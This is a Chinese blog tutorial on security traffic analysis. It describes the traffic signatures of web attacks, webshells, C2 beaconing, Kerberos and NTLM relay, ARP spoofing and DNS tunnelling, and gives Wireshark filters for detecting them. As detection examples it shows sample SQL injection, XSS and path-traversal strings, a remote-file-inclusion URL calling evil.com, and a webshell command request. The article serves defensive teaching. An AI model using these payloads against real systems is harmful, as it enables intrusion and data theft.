流量分析基础知识一文速通

最新推荐文章于 2025-06-06 15:30:21 发布
最新推荐文章于 2025-06-06 15:30:21 发布
阅读量1.9k 收藏 18
点赞数 28
CC 4.0 BY-SA版权
文章标签: 流量分析 安全运维 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79518550/article/details/145687918

🔍 1. 引言:流量分析的重要性

在网络安全领域,流量分析是检测攻击、溯源黑客行为、取证分析的核心技术之一。无论是 Web 攻击、内网渗透,还是协议滥用,流量数据都是最直接、最可靠的证据。

在安全事件调查中,我们通常依赖 电子四大证据

  • 📜 日志(Logs):记录主机、网络设备、安全设备的操作历史,如 WAF、IDS/IPS 记录的攻击日志。
  • 🌐 流量(Traffic):抓取网络数据包,分析攻击者行为及 C2(命令控制)通信。
  • 🧠 内存(Memory):分析进程运行时的内容,可能包含密钥、后门、Shellcode。
  • 💽 磁盘(Disk):存储攻击者植入的 WebShell、恶意程序、凭据等关键数据。

🛠 2. 流量分析核心工具

工具功能适用场景
Wireshark图形化抓包分析工具详细分析流量,检测攻击行为
TsharkWireshark 命令行版本批量解析流量、自动化分析
Tcpdump轻量级抓包工具服务器端实时流量监测

📖 三大篇章:深入解析流量分析核心技术

分析方向重点内容
Web 安全流量分析Web 攻击(SQL 注入、XSS)、WebShell 特征分析与解密
内网安全流量分析常见 C2 流量(Meterpreter、Cobalt Strike)、横向移动、Kerberos 与 NTLM 协议
网络协议安全分析ARP 欺骗、MAC 欺骗、DHCP 伪造、DNS 隧道等流量攻击

📌 1. Web 安全流量分析

🔴 Web 攻击流量特征分析

常见 Web 攻击(SQLi、XSS、文件包含)具有明显的流量特征,如:

SQL 注入(SQLi)

GET /index.php?id=1 UNION SELECT 1,2,3--
  • 特征
    • 出现 UNION SELECTOR 1=1AND 1=1等 SQL 关键字
    • 非正常 HTTP 请求,通常伴随 500、403、200 等异常状态码
    • 访问日志中 SQL 语句异常暴露

XSS 攻击

GET /search?q=<script>alert(‘XSS’);</script>
  • 特征
    • scriptonerror<img src=x onerror=alert(1)> 等关键字
    • URL 中出现 %3Cscript%3E(URL 编码)
    • 受害者主机向攻击者 IP 发起 HTTP 请求

文件包含(LFI/RFI)

?page=../../../../../etc/passwd
  • 特征
    • URL 中 ../..//etc/passwd 关键字
    • .php?page=http://evil.com/shell.txt 远程文件包含(RFI)
    • HTTP 响应数据中泄露系统文件内容

🕵️‍♂️ WebShell 解析与解密

WebShell 主要通过 HTTP POST 进行交互,常见特征包括:

  • 特征 1:POST 请求包含可疑 Payload
    POST /uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
cmd=whoami
  • 特征 2:返回异常响应
    • 正常网站通常返回 200,但 WebShell 可能返回 空白页面(HTTP 204)500
  • 特征 3:WebShell 加密流量
    • 使用 Base64 编码,如 ZXZhbCgnbHMgLWFsJyk=(解码后为 eval('ls -al')

检测方式

  • 结合 Wireshark + YARA 规则 扫描 WebShell 关键字
  • 在 WAF 规则中 拦截异常 POST 访问

📌 2. 内网安全流量分析

🔴 常见 C2 攻击流量

C2 工具流量特征
MeterpreterHTTP/HTTPS 长连接,伪装正常流量
Cobalt Strike可定制 C2,流量可能模仿正常网站访问
Sliver / Havoc使用 WebSocket 或 DNS 隧道
Cobalt Strike 流量检测
  • 特征
    • 心跳包(Beaconing)间隔固定
    • 服务器返回伪造 404、503 状态码
  • Wireshark 过滤规则
    http.request && ip.src==192.168.1.100

🕵️‍♂️ 横向移动流量分析

🔹 Kerberos 攻击流量

  • 攻击方式
    • AS-REP Roasting:请求未加密的 TGT 票据
    • Pass-the-Ticket(PtT):窃取票据并伪造身份
  • 流量特征
    kerberos.CnameString=="Administrator"
    • 大量 AS-REQ 请求
    • 目标账号可能为高权限用户

🔹 NTLM Relay 攻击

  • 特征
    • NTLMSSP_AUTH 请求异常增多
    • SMB、LDAP 认证失败率升高
  • 检测
    smb && ntlmssp

📌 3. 网络协议安全分析

🔴 协议攻击与流量分析

协议攻击手法检测方式
ARPARP 欺骗(中间人攻击)arp.duplicate-address-detected
MACMAC 伪造(Mac Spoofing)eth.src == MAC地址
DHCPRogue DHCP 服务器bootp.option.dhcp == 2
DNSDNS 隧道、劫持dns.qry.name contains "example.com"

🕵️‍♂️ DNS 隧道检测

  • 特征
    • DNS 请求长度异常(如 Base64 编码)
    • 频繁向非标准 DNS 服务器请求
  • Wireshark 过滤规则
    dns && frame.len > 300

🎯 结语:流量分析是安全分析的核心技能

流量分析不仅是 安全事件响应(Incident Response) 的核心,更是发现攻击、溯源黑客的重要手段。掌握 工具、协议、攻击流量特征,能让你在攻防对抗中快人一步!

vortex5
关注
解密Kerberos流量
谢公子的博客
09-13 3223
在域内流量分析的时候,经常需要解密Kerberos的流量。
Redis数据库【一文
孤寒者的博客
09-06 1万+
Redis数据库【一文
关于网络流量分析,终于有人说透了,(非常详细)从零基础到精,收藏这篇就够了!
最新发布
leah126的博客
06-06 845
此外,针对提供对外服务的系统,过对网络流量的收集和解析,使用traceid或网络五元组等条件进行组合关联,统一展现交易请求访问流经的各业务系统的性能指标,反应每笔请求从门户进入,经过防火墙、负载均衡、核心应用到数据库等整个业务处理过程的实际消耗时间,处理结果及每段原始交易纪录,深层解析交易处理流程,精准刻画用户访问路径。用协议的解码分析相对容易。企业内部的系统都是逐步建设起来的,尤其是金融行业,往往拥有各种各样的自建系统,大多数系统的开发商都不同,如何用统一标准来衡量业务系统的健康状况便成为难题。
SMB流量分析
欢迎光临
09-13 2138
SMB协议流量主要分为以下几个阶段1、 tcp三次握手2、会话建立(Negotiate Protocol):客户端发送Negotiate Protocol Request ,其中包含客户端支持的smb协议版本列表以及SMB Header信息服务端发送Negotiate Protocol Response,包含服务器选择的协议版本、会话密钥 等3、会话设置(Session Setup)首先进行tcp三次握手。
有关流量分析和内存取证的
xiao_xianyu123的博客
01-09 5210
1.流量分析   网络流量分析是指捕捉网络中流动的数据包,并过查看包内部数据以及进行相关的协议、流量分析、统计等来发现网络运行过程中出现的问题。   CTF比赛中,常比赛中会提供一个包含流量数据的 PCAP 文件,进行分析。 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可) 3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:usernam
流量分析
chanbeng5693的博客
08-02 704
分 析 报 告数据包: LAN SEGMENT属性:IP范围:10.1.75.0/24(10.1.75.0到10.1.75.255)网关IP:10.1.75.1广播IP:10.1.75.255域控制器(DC):PixelShine-DC,10.1.75.4域名:pixelshine.net 需求: 说明这种感染的时间和日期。确定受感染的Windows客户端的IP地址。确定受感染的Win...
【转】DNS隧道检测特征
WangYouJin321的博客
11-22 916
企业内网环境中,DNS协议是必不可少的网络信协议之一,为了访问互联网和内网资源,DNS提供域名解析服务,将域名和IP地址进行转换。网络设备和边界防护设备在一般的情况下很少对DNS进行过滤分析或屏蔽,因此将数据或指令藏匿于DNS协议中进行传输是一种隐蔽且有效的手段。在实际场景中,当攻击者拿下某台服务器权限,或服务器被恶意软件、蠕虫、木马等感染之后,过建立DNS隧道从而达到敏感信息盗窃、文件传输、回传控制指令、回弹Shell等目的。
Python基础知识一文了解列表知识
08-04
Python基础知识一文了解列表知识
【Java基础知识 1】Java入门级概述
热门推荐
学Java,找哪吒
09-25 16万+
CSDN最强Java专栏,包含全部Java基础知识点、Java8新特性、Java集合、Java多线程、Java代码实例,理论结合实战,实现Java的轻松学习。
一文搞懂CNN的基础知识
05-28
一文搞懂CNN的基础知识
基础知识一文读懂防抖和节流
09-09
基础知识一文读懂防抖和节流
【web网络安全网络安全基础阶段三(实战篇)
2301_76261573的博客
05-17 1498
本文过实战详细完成了简单的渗透过程和对应的应急安全处理。
应急响应-MSF流量分析&模式模块&特征提取
SuperherRo的博客
04-13 2381
战后-流量分析-MSF
DDoS攻击:如何辨别和应对?
Python_0011的博客
11-19 124
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…DDoS攻击的特点是过大量合法的请求或者无效的请求,消耗目标服务器的网络带宽和系统资源,使其无法正常运行。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
2024世界技能大赛某省选拔赛“网络安全项目”B模块--数据包分析(SMB流量)
Aluxian_的博客
07-24 870
A 集团的网络安全监控系统发现有恶意攻击者对集团官方网站进行攻击,并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,并分析黑客的恶意行为。本任务素材清单:捕获的网络数据包文件(*.pcap) 请按答题卡的要求完成该部分的工作任务。1.受感染的 Windows 主机名是什么?将答案过MD5 运算后返回哈希值的十六进制结果作为Flag值提交(形式:十六进制字符串);2.受感染的windows主机用户帐户名是什么?将答案过MD5 运算后返回哈希值的十六进制结果作为Flag值提交(形式:十六进
什么是HyperText Transfer Protocol 超文本传输协议
vincent_wen0766的博客
10-22 2175
协议 协议是一种约定,规定好一种信息的格式,如果发送端按照这种请求格式发送信息,那么接 收端就要按照这样的格式解析数据,这就是协议 json协议 { “name”:"vincent", "age":20 } xml协议 <user> <name> vincent </name> <age> 24 </age> </user> http超文本传输协议 什么是http协议 即超文本.
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 4260
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
webshell使用与流量分析(含数据包)
hackzkaq的博客
04-29 4564
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
域渗透-kerberos协议分析
whojoe的博客
07-13 1991
域渗透-kerberos协议分析环境搭建名词解释认证过程AS-REQ抓包的真实情况AS-REP用户名和密码正确(第二个包)用户名不正确(第一个包)用户名正确(第一个包)密码不正确(只有第一个包,无第二个包)TGS-REQTGS-REPST认证参考文章 文章中对之前的文章提出了一些疑问,如果发现有错误,还望斧正 环境搭建 这里的域环境搭建就不再细说 主机 ip 用户 主机名 域控 192.168.164.133 administrator ad.test.com 域内主机 192.168.
一文esp8266
01-26
### ESP8266 快入门教程 #### 硬件准备 对于初学者来说,ESP8266 是一款非常适合学习和实验的微控制器。所需的主要硬件包括一台电脑以及一块支持 USB 接口供电并能直接过该接口进行程序烧录操作的 ESP8266 开发板,比如 NodeMCU 或 WiFiDuino 版本均较为推荐[^1]。 #### 软件安装与配置 为了能够顺利地向设备加载代码,在开始编写应用程序之前还需要准备好相应的工具链环境。具体而言就是获取适合目标平台运行的操作系统镜像文件——即固件,并借助专门设计用于刷写这类嵌入式系统的软件完成更新过程;例如 nodemcu-flasher 就是一个不错的选择[^2]。 #### 编程实践 一旦完成了上述准备工作之后便可以着手尝试简单的例子来熟悉整个流程了。这里给出一段 Python 风格的小片段作为示范: ```python import network sta_if = network.WLAN(network.STA_IF) if not sta_if.isconnected(): print('connecting to network...') sta_if.active(True) sta_if.connect('<your-ssid>', '<your-password>') while not sta_if.isconnected(): pass print('network config:', sta_if.ifconfig()) ``` 这段代码实现了连接 Wi-Fi 功能,其中 `<your-ssid>` 和 `<your-password>` 应替换为实际的家庭路由器设置参数。成功执行后将会打印出分配给当前节点 IP 地址等网络信息[^3]。 #### 进阶技巧 当掌握了基础知识以后还可以探索更多高级特性,如利用命令行工具自定义编译选项以适应不同应用场景下的需求。例如可以过指定 `ESPPORT` 参数覆盖默认串口号来进行闪存或监控操作,同样也能调整波特率从而优化传输效率[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值